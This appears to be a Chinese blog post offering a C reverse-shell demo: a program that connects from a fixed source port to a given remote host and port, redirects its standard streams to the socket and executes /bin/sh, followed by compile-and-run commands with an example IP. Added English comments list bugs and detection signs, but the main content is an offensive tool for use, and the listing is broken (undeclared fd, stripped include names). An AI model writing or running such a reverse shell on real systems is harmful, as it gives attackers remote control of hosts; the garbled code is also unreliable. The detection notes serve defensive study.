NC反弹的小demo


一个有趣的NC反弹shell的demo

#include  
#include  
#include  
#include  
#include  
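/**
 * Report a failed library/system call and terminate the program.
 *
 * @param msg  Prefix passed to perror(); perror() appends the text for the
 *             current errno value and writes the result to stderr.
 *
 * Does not return. Exits with a non-zero status so that a calling script or
 * supervisor can tell a failure from a normal run (the original exited
 * with 0, which reports success).
 */
void error(const char *msg)
{
    perror(msg);
    exit(EXIT_FAILURE);
}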
/*
 * Demo entry point. Binds a TCP socket to a caller-chosen local source port,
 * connects it to argv[1]:argv[2], calls dup2() onto descriptors 0, 1 and 2,
 * and then replaces the process image with /bin/sh.
 *
 * Arguments: argv[1] = remote host, argv[2] = remote port,
 *            argv[3] = local source port.
 *
 * NOTE(review): problems visible in this listing:
 *   - `fd` is used in the dup2()/close() calls but is never declared here.
 *   - The argc check admits argc == 3, yet argv[3] is read afterwards;
 *     atoi(NULL) is undefined behavior.
 *   - atoi() gives no error reporting, so non-numeric ports become 0.
 *   - The return values of dup2() and execl() are not checked; close() is
 *     reached only if execl() fails.
 *   - `n` and `buffer` are declared but unused; main has no return statement.
 *   - The trailing "n" in the usage string looks like a lost "\n" escape
 *     (the #include names are also missing) - confirm against the original.
 *
 * Detection notes (what this pattern looks like from the host/network side):
 *   - a shell process whose descriptors 0-2 refer to a connected TCP socket
 *     rather than a tty or pipe;
 *   - an outbound TCP connection whose source port was fixed with bind()
 *     before connect(), instead of being an ephemeral port;
 *   - argv[0] of the exec'd shell is the single literal string "sh -i".
 */
int main(int argc,char *argv[])  
{  
    int sockfd,portno,lportno,n;  
    struct sockaddr_in serv_addr;  
    struct sockaddr_in client_addr;  
    struct hostent *server;  
    char buffer[256];  
    if (argc < 3) {  
        fprintf(stderr,"usage %s hostname port LocalPortn",argv[0]);  
        exit(0);  
    } // three arguments: target host, target host port, local source port
    portno = atoi(argv[2]);  
    sockfd = socket(AF_INET,SOCK_STREAM,0);  
    if (sockfd < 0)  
    error("ERROR opening socket");  
    bzero((char *) &client_addr,sizeof(client_addr));  
    lportno = atoi(argv[3]);  // NOTE(review): argv[3] is NULL when argc == 3
    client_addr.sin_family = AF_INET;  
    client_addr.sin_addr.s_addr = INADDR_ANY;  // any local interface
    client_addr.sin_port = htons(lportno); // set the local source port
    // bind() before connect() is what pins the source port of the outbound connection
    if (bind(sockfd,(struct sockaddr *) &client_addr,sizeof(client_addr)) < 0)  
    error("ERROR on binding");  
    server = gethostbyname(argv[1]);  
    if (server == NULL) {  
    fprintf(stderr,"ERROR,no such host ");  
    exit(0);  
    }  
        bzero((char *) &serv_addr,sizeof(serv_addr));  
    serv_addr.sin_family = AF_INET;  
    // copy the first resolved address into the destination structure
    bcopy((char *)server->h_addr,(char *)&serv_addr.sin_addr.s_addr,server->h_length);  
    serv_addr.sin_port = htons(portno);  
    // NOTE(review): unlike the bind() call above, &serv_addr is passed without a cast to struct sockaddr *
    if (connect(sockfd,&serv_addr,sizeof(serv_addr)) < 0) // connect to the remote host
    error("ERROR connecting");  
    // NOTE(review): `fd` is not declared anywhere in this listing
    dup2(fd,0);  
    dup2(fd,1);  
    dup2(fd,2);  
    execl("/bin/sh","sh -i",NULL); // execute the shell; "sh -i" is passed as argv[0]
    close(fd);  // only reached if execl() fails
}

编译后按如下方式执行:

gcc client-port.c -o port  
    chmod +x port  
    ./port  你的IP 你的监听端口 本地的源端口

eg

./port 111.111.111.111 80 80
